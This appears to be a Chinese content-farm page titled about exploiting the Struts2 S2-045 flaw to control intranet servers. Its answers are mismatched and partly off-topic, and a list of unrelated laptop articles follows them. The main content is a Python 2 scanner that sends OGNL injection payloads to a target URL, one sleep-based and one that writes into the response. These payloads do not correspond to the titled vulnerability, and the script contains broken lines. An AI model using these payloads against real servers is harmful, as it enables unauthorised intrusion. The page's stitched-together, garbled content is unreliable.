s2 045(如何利用s2 045漏洞控制内网服务器)
本文目录
如何利用s2 045漏洞控制内网服务器
1,是可以修复电脑漏洞的 2,这个修复电脑漏洞,不论什么样的电脑系统都是很需要的 3,可以使用电脑管家,有一个修复漏洞,然后使用它来检测电脑里面的漏洞
去腾讯智慧安全申请个御点终端安全系统申请好了之后,打开腾讯御点,选择修复漏洞可以自动检测出电脑里面需要修复的漏洞然后一键修复
struts1是否会有s2-045漏洞
Struts2远程代码执行漏洞检测检测 ============================================================== import os,sys import httplib import string import time import urlparse def SendHTTPRequest(strMethod,strScheme,strHost,strURL,strParam): headers = { "Accept": "image/gif, */*", "Referer": strScheme + "://" + strHost, "Accept-Language": "zh-cn", "Content-Type": "application/x-www-form-urlencoded", "Accept-Encoding": "gzip, deflate", "User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)", "Host": strHost, "Connection": "Keep-Alive", "Cache-Control": "no-cache" } strRet="" time_inter=0 try: time1=0 time2=0 time1=time.time() * 1000 if strScheme.upper()=="HTTPS": con2 = httplib.HTTPSConnection(strHost) else: con2 = httplib.HTTPConnection(strHost) if strMethod.upper()=="POST": con2.request(method="POST",url= strURL, body=strParam, headers=headers) else: con2.request(method="GET",url= strURL, headers=headers) r2 = con2.getresponse() strRet= r2.read().strip() time2=time.time() * 1000 time_inter=time2-time1 con2.close except BaseException,e: print e con2.close return (time_inter,strRet) def RunTest1(strScheme,strHost,strURL): payload1="""(’\\43_memberAccess.allowStaticMethodAccess’)(a)=true&(b)((’\\43context\\75false’)(b))&(’\\43c’)((’\\43_memberAccess.excludeProperties\\75@java.util.Collections@EMPTY_SET’)(c))&(d)((’@java.lang.Thread@sleep(8000)’)(d))""" (inter1,html1)=SendHTTPRequest("GET",strScheme,strHost,strURL,"") (inter2,html2)=SendHTTPRequest("POST",strScheme,strHost,strURL,payload1) if (inter2 - inter1)》6000: return True else: return False def RunTest2(strScheme,strHost,strURL): payload1="""(’\\43_memberAccess\\75false’)(d))&(’\\43c’)((’\\43_memberAccess.excludeProperties\\75@java.util.Collections@EMPTY_SET’)(c))&(asdf)((’\\43rp\\75@org.apache.struts2.ServletActionContext@getResponse()’)(c))&(fgd)((’\\43rp.getWriter().print("struts2-security")’)(d))&(fgd)&(grgr)((’\\43rp.getWriter().close()’)(d))=1""" (inter1,html1)=SendHTTPRequest("POST",strScheme,strHost,strURL,payload1) if html1.find("struts2-security")》=0: return True else: return False def RunTests(strURL): t_url=urlparse.urlparse(strURL) strScheme=t_url.scheme strHost = t_url.netloc strURL1 = t_url.path print "Checking " + strURL if RunTest2(strScheme,strHost,strURL1): print "Vulnerable!" return True elif RunTest1(strScheme,strHost,strURL1): print "Vulnerable!" return True else: print "Secure." return False if __name__ == "__main__": if len(sys.argv)!=2: print "INVALID ARGUMENTS."print "USAGE : python struts_scan.py http(s)://target.url" exit() m_URL=sys.argv RunTests(m_URL)
更多文章:
显卡bios下载网站(显卡的BIOS文件在哪里下载Nvidia GeForce GT 220)
2024年7月22日 13:32
惠普电池601错如何自己维修(HP Pavilion g4笔记本电池长期不用,现在显示Battery(601),求电池校准方案)
2024年6月25日 07:00
华硕vm510l二手值多少钱(华硕vm510l5200 多少钱)
2023年7月29日 13:00
三星r458笔记本硬件能升级吗(三星R458笔记本电脑独立显卡可以升级吗)
2024年1月30日 13:50
联想ideapad310怎么进入bios(IdeaPad310-15ABR怎么开vt)
2024年9月13日 16:35
联想移动硬盘f309驱动(联想f310移动硬盘插入电脑后自动安装不了驱动,是不是电脑缺少什么文件)
2024年6月5日 10:21
电脑网站怎么翻译成中文(怎样能把正在打开的外文网页翻译为中文)
2024年4月30日 14:30
松下cf53u盘启动设置(松下cf-53安装新系统一直安装不上,u盘启动不了,请求指导!谢谢!)
2023年12月15日 11:00
东芝m800好用吗(想买本本,联想Y450系列和东芝M800系列,哪个好点吖)
2023年12月15日 20:05
联想g580清灰教程(联想g580除尘方法是什么哪位能够说说看)
2024年7月15日 03:10
移动硬盘长期外接玩大型游戏(移动机械硬盘可以长时间打游戏吗)
2024年7月9日 07:30